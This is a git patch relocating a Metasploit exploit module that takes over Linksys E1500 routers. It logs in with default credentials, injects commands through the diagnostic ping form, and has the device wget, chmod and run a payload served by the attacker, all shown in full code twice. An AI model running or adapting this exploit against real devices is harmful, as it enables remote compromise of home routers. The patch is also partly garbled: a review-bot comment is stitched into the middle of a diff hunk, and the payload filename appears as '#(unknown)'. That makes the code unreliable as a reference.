From dfd451f8750904124d557c02b01e29ee4b9ae4bb Mon Sep 17 00:00:00 2001
From: m-1-k-3
Date: Wed, 27 Mar 2013 17:46:02 +0100
Subject: [PATCH] make msftidy happy

---
 .../linux/http/linksys_e1500_up_exec.rb | 192 +++++++++++++++++
 .../multi/http/linksys_e1500_up_exec.rb | 196 ------------------
 2 files changed, 192 insertions(+), 196 deletions(-)
 create mode 100644 modules/exploits/linux/http/linksys_e1500_up_exec.rb
 delete mode 100644 modules/exploits/multi/http/linksys_e1500_up_exec.rb

diff --git a/modules/exploits/linux/http/linksys_e1500_up_exec.rb b/modules/exploits/linux/http/linksys_e1500_up_exec.rb
new file mode 100644
index 0000000000..9a701d3fb8
--- /dev/null
+++ b/modules/exploits/linux/http/linksys_e1500_up_exec.rb
@@ -0,0 +1,192 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+# http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Exploit::Remote::HttpServer
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Linksys E1500 Command Execution - Upload and Execute',
+ 'Description' => %q{
+ This module can be used to execute a payload on Linksys Routers
+ },
+ 'Author' => [ 'Michael Messner '],
+ 'License' => MSF_LICENSE,
+ 'References' =>
+ [
+ [ 'BID', '57760' ],
+ [ 'EDB', '24475' ],
+ [ 'OSVDB', '89912' ],
+ [ 'URL', 'http://www.s3cur1ty.de/m1adv2013-004' ]
+ ],
+ 'DisclosureDate' => 'Feb 05 2013',
+ 'Privileged' => true,
+ 'Platform' => [ 'linux' ],
+ 'Arch' => ARCH_MIPSLE,
+ 'Targets' => [[ 'Automatic', { }]],
+ 'Payload' =>
+ {
+ 'Space' => 1024,
+ 'DisableNops' => true,
+ },
+ 'DefaultTarget' => 0
+ ))
+
+ register_options(
+ [
+ Opt::RPORT(80),
+ OptString.new('USERNAME', [ true, 'The username to authenticate as', 'admin' ]),
+ OptString.new('PASSWORD', [ true, 'The password for the specified username', 'admin' ]),
+ OptString.new('DOWNHOST', [ false, 'The host to request the MIPS payload from' ]),
+ OptString.new('DOWNFILE', [ false, 'Filename to download, (default: random)', nil ]),
+ OptString.new('SRVHOST', [ true, 'The local host to listen on. 
This must be an address on the local machine' ]),
+ ], self.class)
+ end
+
+ #MISSING - command execution payload
+
+ def request(cmd,user,pass,uri)
+ begin
+ res = send_request_cgi({
+ 'uri' => uri,
+ 'method' => 'POST',
+ 'authorization' => basic_auth(user,pass),
+ 'vars_post' => {
+ "submit_button" => "Diagnostics",
+ "change_action" => "gozila_cgi",
+ "submit_type" => "start_ping",
+ "action" => "",
+ "commit" => "0",
+ "ping_ip" => "1.1.1.1",
+ "ping_size" => "&#{cmd}&",
+ "ping_times" => "5",
+ "traceroute_ip" => ""
+ }
+ })
+
+ if (! res)
+ fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload [No Response]")
+ end
+
+ rescue ::Rex::ConnectionError
+ vprint_error("#{rhost}:#{rport} - Failed to connect to the web server")
+ return
+ end
+ end
+
+ def exploit
+ downfile = datastore['DOWNFILE'] || rand_text_alpha(8+rand(8))
+ uri = '/apply.cgi'
+ user = datastore['USERNAME']
+ pass = datastore['PASSWORD']
+ rhost = datastore['RHOST']
+ rport = datastore['RPORT']
+
+ # We must regenerate the payload-> not sure if this is the right way
+ arch = "ARCH_MIPSLE"
+ plat = "linux"
+ p = exploit_regenerate_payload(plat, arch)
+ @pl = p.encoded_exe
+
+ #
+ # start our server
+ #
+ resource_uri = '/' + downfile
+ service_url = 'http://' + datastore['SRVHOST'] + ':' + datastore['SRVPORT'].to_s + resource_uri
+ print_status("#{rhost}:#{rport} - Starting up our web service on #{service_url} ...")
+ start_service({'Uri' => {
+ 'Proc' => Proc.new { |cli, req|
+ on_request_uri(cli, req)
+ },
+ 'Path' => resource_uri
+ }})
+
+ if (datastore['DOWNHOST'])
+ service_url = 'http://' + datastore['DOWNHOST'] + ':' + datastore['SRVPORT'].to_s + resource_uri
+ end
+
+
+ #
+ # testing Login
+ #
+
+ print_status("#{rhost}:#{rport} - Trying to login with #{user} / #{pass}")
+
+ begin
+ res = send_request_cgi({
+ 'uri' => uri,
+ 'method' => 'GET',
+ 'authorization' => basic_auth(user,pass)
+ })
+
+ return if res.nil? 
+ return if (res.code == 404)
+
+ if [200, 301, 302].include?(res.code)
+ print_good("#{rhost}:#{rport} - Successful login #{user}/#{pass}")
+ else
+ print_error("#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}")
+ return
+ end
+
+ rescue ::Rex::ConnectionError
+ vprint_error("#{rhost}:#{rport} - Failed to connect to the web server")
+ return
+ end
+
+ print_status("#{rhost}:#{rport} - Asking the Linksys device to download #{service_url}")
+
+ #this filename is used to store the payload on the device
+ filename = rand_text_alpha_lower(8)
+
+ cmd = "/usr/bin/wget #{service_url} -O /tmp/#(unknown)"
+
+ request(cmd,user,pass,uri)
+
+ #
+ # chmod
+ #
+
+ cmd = "chmod 777 /tmp/#(unknown)"
+
+ print_status("#{rhost}:#{rport} - Asking the Linksys device to prepare #{downfile}")
+
+ request(cmd,user,pass,uri)
+
+ #
+ # execute
+ #
+
+ cmd = "/tmp/#(unknown)"
+
+ print_status("#{rhost}:#{rport} - Asking the Linksys device to execute #{downfile}")
+
+ request(cmd,user,pass,uri)
+
+ handler
+ end
+
+
+# # Handle incoming requests from the server
+ def on_request_uri(cli, request)
+
+ #print_status("on_request_uri called: #{request.inspect}")
+ if (not @pl)
+ print_error("#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!")
+ return
+ end
+
+ print_status("#{rhost}:#{rport} - Sending the payload to the server...")
+ send_response(cli, @pl)
+ end
+
+end
diff --git a/modules/exploits/multi/http/linksys_e1500_up_exec.rb b/modules/exploits/multi/http/linksys_e1500_up_exec.rb
deleted file mode 100644
index 46a19fbd7b..0000000000
--- a/modules/exploits/multi/http/linksys_e1500_up_exec.rb
+++ /dev/null
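Review bot: The login diagnostics in `exploit` write the PASSWORD option to the console: `print_status("#{rhost}:#{rport} - Trying to login with #{user} / #{pass}")` before the `begin`, and the `print_good`/`print_error` lines right after `return if (res.code == 404)` both interpolate `#{pass}`, so the credential lands in every console transcript and session log. Reporting only the account, e.g. `print_status("#{rhost}:#{rport} - Trying to login as #{user}")` and `print_good("#{rhost}:#{rport} - Successful login as #{user}")`, keeps the same diagnostic value without echoing a secret. Separately, `rhost = datastore['RHOST']` and `rport = datastore['RPORT']` in `exploit` shadow the `rhost`/`rport` mixin methods that `request` and `on_request_uri` already rely on, and the `request` parameter of `on_request_uri(cli, request)` shadows the module's own `request` method; dropping the two locals and renaming the parameter to `req`, as the `Proc` block in `start_service` already does, removes the inconsistency. The bare `#MISSING - command execution payload` line above `def request` reads as a leftover note and should either become a proper `# TODO:` or be removed.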
@@ -1,196 +0,0 @@
-##
-# This file is part of the Metasploit Framework and may be subject to
-# redistribution and commercial restrictions. Please see the Metasploit
-# web site for more information on licensing and terms of use.
-# http://metasploit.com/
-##
-
-require 'msf/core'
-
-class Metasploit3 < Msf::Exploit::Remote
- Rank = ExcellentRanking
-
- include Msf::Exploit::Remote::HttpClient
- include Msf::Exploit::Remote::HttpServer
-
- def initialize(info = {})
- super(update_info(info,
- 'Name' => 'Linksys E1500 Command Execution - Upload and Execute',
- 'Description' => %q{
- This module can be used to execute a payload on Linksys Routers
- },
- 'Author' => [ 'Michael Messner '],
- 'License' => MSF_LICENSE,
- 'References' =>
- [
- [ 'BID', '57760' ],
- [ 'EDB', '24475' ],
- [ 'OSVDB', '89912' ],
- [ 'URL', 'http://www.s3cur1ty.de/m1adv2013-004' ]
- ],
- 'DisclosureDate' => 'Feb 05 2013',
- 'Privileged' => true,
- 'Platform' => [ 'linux' ],
- 'Arch' => ARCH_MIPSLE,
- 'Targets' => [[ 'Automatic', { }]],
- 'Payload' =>
- {
- 'Space' => 1024,
- 'DisableNops' => true,
- },
- 'DefaultTarget' => 0
- ))
-
- register_options(
- [
- Opt::RPORT(80),
- OptString.new('USERNAME', [ true, 'The username to authenticate as', 'admin' ]),
- OptString.new('PASSWORD', [ true, 'The password for the specified username', 'admin' ]),
- OptString.new('DOWNHOST', [ false, 'The host to request the MIPS payload from' ]),
- OptString.new('DOWNFILE', [ false, 'Filename to download, (default: random)', nil ]),
- OptString.new('SRVHOST', [ true, 'The local host to listen on. 
This must be an address on the local machine' ]),
- ], self.class)
- end
-
-
-
- def request(cmd,user,pass,uri)
-
- begin
- res = send_request_cgi({
- 'uri' => uri,
- 'method' => 'POST',
- 'authorization' => basic_auth(user,pass),
- 'encode_params' => true,
- 'vars_post' => {
- "submit_button" => "Diagnostics",
- "change_action" => "gozila_cgi",
- "submit_type" => "start_ping",
- "action" => "",
- "commit" => "0",
- "ping_ip" => "1.1.1.1",
- "ping_size" => "&#{cmd}&",
- "ping_times" => "5",
- "traceroute_ip" => ""
- }
- })
-
- if (! res)
- fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload [No Response]")
- end
-
- rescue ::Rex::ConnectionError
- vprint_error("#{rhost}:#{rport} - Failed to connect to the web server")
- return
- end
-
-
- end
-
- def exploit
- downfile = datastore['DOWNFILE'] || rand_text_alpha(8+rand(8))
- uri = '/apply.cgi'
- user = datastore['USERNAME']
- pass = datastore['PASSWORD']
- rhost = datastore['RHOST']
- rport = datastore['RPORT']
-
- # We must regenerate the payload-> not sure if this is the right way
- arch = "ARCH_MIPSLE"
- plat = "linux"
- p = exploit_regenerate_payload(plat, arch)
- @pl = p.encoded_exe
-
- #
- # start our server
- #
- resource_uri = '/' + downfile
- service_url = 'http://' + datastore['SRVHOST'] + ':' + datastore['SRVPORT'].to_s + resource_uri
- print_status("#{rhost}:#{rport} - Starting up our web service on #{service_url} ...")
- start_service({'Uri' => {
- 'Proc' => Proc.new { |cli, req|
- on_request_uri(cli, req)
- },
- 'Path' => resource_uri
- }})
-
- if (datastore['DOWNHOST'])
- service_url = 'http://' + datastore['DOWNHOST'] + ':' + datastore['SRVPORT'].to_s + resource_uri
- end
-
-
- #
- # testing Login
- #
-
- print_status("#{rhost}:#{rport} - Trying to login with #{user} / #{pass}")
-
- begin
- res = send_request_cgi({
- 'uri' => uri,
- 'method' => 'GET',
- 'authorization' => basic_auth(user,pass)
- })
-
- return if res.nil? 
- return if (res.code == 404)
-
- if [200, 301, 302].include?(res.code)
- print_good("#{rhost}:#{rport} - Successful login #{user}/#{pass}")
- else
- print_error("#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}")
- return
- end
-
- rescue ::Rex::ConnectionError
- vprint_error("#{rhost}:#{rport} - Failed to connect to the web server")
- return
- end
-
- print_status("#{rhost}:#{rport} - Asking the Linksys device to download #{service_url}")
-
- #this filename is used to store the payload on the device
- filename = rand_text_alpha_lower(8)
-
- cmd = "/usr/bin/wget #{service_url} -O /tmp/#(unknown)"
-
- request(cmd,user,pass,uri)
-
- #
- # chmod
- #
-
- cmd = "chmod 777 /tmp/#(unknown)"
-
- print_status("#{rhost}:#{rport} - Asking the Linksys device to prepare #{downfile}")
-
- request(cmd,user,pass,uri)
-
- #
- # execute
- #
-
- cmd = "/tmp/#(unknown)"
-
- print_status("#{rhost}:#{rport} - Asking the Linksys device to execute #{downfile}")
-
- request(cmd,user,pass,uri)
-
- handler
- end
-
-
-# # Handle incoming requests from the server
- def on_request_uri(cli, request)
-
- #print_status("on_request_uri called: #{request.inspect}")
- if (not @pl)
- print_error("#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!")
- return
- end
-
- print_status("#{rhost}:#{rport} - Sending the payload to the server...")
- send_response(cli, @pl)
- end
-
-end